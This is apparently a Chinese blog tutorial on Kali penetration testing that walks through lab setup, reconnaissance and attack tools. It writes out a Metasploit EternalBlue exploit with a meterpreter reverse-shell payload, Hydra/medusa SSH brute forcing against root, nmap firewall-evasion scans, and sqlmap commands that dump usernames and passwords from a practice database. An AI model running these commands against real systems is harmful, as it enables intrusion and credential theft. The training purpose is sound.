体验Kali渗透工具

msfconsole
msfconsole:启动metasploit命令行。[命令行效率高,使用方便]

msf使用法则:使用模块->配置模块必选项->运行模块三步操作,就能实现对主流漏洞的攻击

metasploit

永恒之蓝是指2017年4月14日晚,黑客团体ShadowBrokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

metasploit攻击全流程

1.使用模块
use exploit/windows/smb/ms17_010_eternalblue
2.设置必选项

查看必选项[*required为yes的就是必选项]show options

set RHOSTS 192.168.1.128

[*RHOSTS为target host(s)代表你要攻击谁]

set payload windows/x64/meterpreter/reverse_tcp

[payload是攻击载荷,就是攻击完成后想干啥,这里是想获取meterpreter][meterpreter是metasploit后渗透的神器]

set LHOST 192.188.1.136
[LHOSTS为listen host 代表你是谁,既Kali的IP地址]
set LPORT 12345
[
LPORT为listen port,代表你要在kali上开启的端口,1-65535随便选,但不能被占用

网络安全之渗透测试

搭建渗透测试攻击环境
Vmware workstation pro
功能强大的桌面虚拟计算机软件,能够让用户在单一主机同时运行多个不同的操作系统。同时支持实时快照,虚拟网络,拖拽文件等强悍功能。

为什么不选择物理机安装?物理机不方便,妨碍正常电脑功能虚拟机不会有太大的性能折损虚拟机安全、方便、易恢复、易迁移、易拓展硬件

docker快速搭建漏洞靶场指南

docker搭建DVWA
kali 安装 docker :
sudo apt install -y docker.io
apt是debian系统的软件包管理器(kali和ubuntu其实也是debian的分支)
使用示例:

apt install firefox (安装火狐浏览器
apt removefirefox (卸载火狐浏览器
apt upgrade firefox (升级火狐浏览器

遇到问题
┌──(root㉿kali)-[~]
└─# apt install -y docker.io
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
E: Unable to locate package docker.io
E: Couldn't find any package by glob 'docker.io'

解决:sudo apt-get update

为kali配置阿里云加速器

sudo mkdir -p /etc/docker
sudo tee /etc/docker/daemon.json <<-'EOF'
{
  "registry-mirrors": ["https://i9phuco1.mirror.aliyuncs.com"]
}
EOF
sudo systemctl daemon-reload
sudo systemctl restart docker

docker基础使用

启动docker服务 systemctl start docker
列出镜像 docker images
列出容器
docker ps -a / docker container Is -a
o
删除镜像docker rmi [image_id]
删除容器docker rm [container idl

docker搭建DVWA

访问dockerhub的dwa镜像
下载镜像
docker pull vulnerables/web-dvw
通过镜像启动容器docker run --rm -it -p 80:80 vulnerables/web-dvwa
将容器里的80端口映射到Kali的80端口 (网站服务)
关闭容器 docker stop [container id]
开启容器 docker start [container id]

image.png

image.png

vulhub搭建漏洞复现

docker-compose: docker-compose是什么?Docker Compose是一个用来定义和运行复杂应用的Docker工具。一个使用Docker容器的应用,通常由多个容器组成。使用Docker Compose不再需要使用shell脚本来启动容器。

1.安装pip
curl-s https://bootstrap.pypa.io/get-pip.py l python3
2.安装docker-compose
pip3 install docker-compose

image.png

vulhub搭建漏洞复现

vulhub : https://vulhub.org/
开启靶场容器docker-compose up -d
关闭靶场容器docker-composedown
启动靶场环境
docker-compose up -d

网络空间测绘

钟馗之眼

https://www.zoomeye.org/

image.png

Shodan

Shodan Search Engine
image.png

FOFA

FOFA网络空间测绘系统
image.png

Quake

image.png

Hunter 鹰图

鹰图平台 (qianxin.com)

image.png

Peiqi文库

PeiQi文库 (amobaishi.com)

image.png

端口扫描

常用端口
image.png
image.png

怎么去对一个ip做端口扫描?
nmap

image.png

全面扫描/综合扫描
nmap -A xxx.xx.xx.xx
Ping 扫描
nmap -sP xx.xx.xx.xx/24
免ping扫描。穿透防火墙,避免被防火墙发现
nmap -P0 xx.xx.xx.xx
TCP SYN Ping 扫描
nmap -PS -v xx.xx.xx.xx
TCP SYN 扫描(高效的扫描方式)
nmap -sS -v xx.xx.xx.xx
时序扫描
nmap -T(0-5) xx.xx.xx.xx
常用扫描方式

nmap -p 80 xx.xx.xx.xx
nmap-p 80-100 xx.xx.xx.xx
nmap -p T:80,U:445 xx.xx.xx.xx
nmap -F xx.xx.xx.xx(快速扫描)
nmap --top-ports 100 xx.xx.xx.xx
(扫描最有用的前100个端口)

版本探测
nmap -sV xx.xx.xx.xx
nmap -sV-A xx.xx.xx.xx

全端口版本探测
nmap -sV --allports xx.xx.xx.xx
设置扫描强度
nmap -sV --version-intensity (O-9)xx.xx.xx.xx

...............................

子域名爆破

顶级域名

.com(商业公司)
.net(网络服务)
.org(组织协会等)
.CN代表中国
.gov.cn(政府部门)
.UK代表英国
.edu(教育机构)
.US代表美国
.mil(军事领域)
.int(国际组织)

DNSdumpster.com - dns recon and research, find and lookup dns records

在线子域名爆破 (zcjun.com)

image.png

目录扫描

常见的敏感文件

  • 网站的备份文件/数据库备份文件wwwroot.zip后台登录的目录manage login
  • 安装包(源码)
  • 上传的目录uploads
  • mysql的管理界面phpmyadmin程序的安装路径install

文件扫描思路

原理:拼接子目录访问,分析HTTP响应
方法:字典、暴力破解、爬虫

工具

Burp Suite
dirb(kali自带)
御剑
dirbuster
。。。
image.png

CMS系统指纹识别

常见CMS
(Content Management System)

  • 企业建站系统: Metlnfo(米拓)、蝉知、SiteServer CMS等;B2C商城系统:商派Shopex、ECshop、HiShop、XpShop等;
  • 门户建站系统:DedeCMS(织梦)、帝国CMS、PHPCMS、动易、CmsTop等;博客系统:WordPress、Z-Blog等;
  • 论坛社区:Discuz、PHPwind、 WeCenter等;问答系统:Tipask、whatsns等;
  • 知识百科系统:HDwiki;
  • B2B门户系统:Destoon、B2Bbuilder、友邻B2B等;
  • 人才招聘网站系统:骑士CMS、PHP云人才管理系统;
  • 房产网站系统:FangCms等;
  • 在线教育建站系统:Kesion、EduSoho;
  • 电影网站系统:苹果CMS、ctcms、movcms等;小说文学建站系统:杰奇CMS;

指纹识别工具:
whatweb(kali)
CMSeeK
Wappalyzer
在线网站
御剑指纹扫描器
Test404轻量CMS指纹识别

whatweb:

image.png

image.png

cmseek

image.png

资产收集综合工具

ARL灯塔
yakit
goby

漏洞数据库

CVE (Common Vulnerabilities & Exposures )

image.png
image.png
image.png

漏洞利用工具

POC: Proof Of Concept
EXP: Exploit 利用
Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers (exploit-db.com)

metasploit>searchsploit
漏洞匹配

image.png
image.png
wordpress漏洞
image.png

kali自带脚本

image.png

商业漏洞扫描工具

Appscan
Nessus
OpenVAS
...

  • 深信服TSS安全评估工具
  • 绿盟绿盟WEB应用漏洞扫描系统(wVSS)绿盟远程安全评估系统(RSAS)
  • 启明天镜脆弱性扫描与管理系统
  • 安恒Web应用弱点扫描器(MatriXay明鉴远程安全评估系统)
  • 奇安信网神SecVSS3600漏洞扫描系统
  • 盛邦安全Web漏洞扫描系统(RaywVS)远程安全评估系统(RayVAS)
  • 斗象科技ARS 智能漏洞与风险检测
  • 长亭科技洞鉴(X-Ray)安全评估系统
  • 四叶草安全全时风险感知平台

暴力破解

Burp Suite 爆破Web密码

image.png
image.png
通过抓取登录请求
image.png
右键点击send intruder 进入
image.png
进行爆破
image.png
找到密码为password
image.png
image.png

Hydra爆破linux密码

爆破root账号举例

hydra -L username.txt -P password.txt 192.168.xx.xx ssh
medusa -M ssh -h 192.168.xx.xx -u root -P password.txt
msfconsole
use auxiliary/scanner/ssh/ssh_loginset RHOSTS xx.xx.xx.xx
set PASS_FILE password.txt
set USER_FILE username.txt
exploit

爆破成功
image.png

image.png

SqlMap渗透数据库

sqlmap -u "http://localhost/sqli-labs/Less-1/?id=1"--dbs

sqlmap -u "http://localhost/sqli-labs/Less-1/?id=1" --level=5 --risk=3 --dbms=mysql -D "security" --tables

sqlmap -u "http://localhost/sqli-labs/Less-1/?id=1" --level=5 --risk= 3 --dbms=mysql -D "security" -T "users" --columns

sqlmap -u "http://localhost/sqli-labs/Less-1/?id=1" --level=5 --risk=3 --dbms=mysql -D "security" -T "users"-C
"password,username"--dump

应急响应中心

image.png

最后修改:2023 年 08 月 15 日
如果觉得我的文章对你有用,请随意赞赏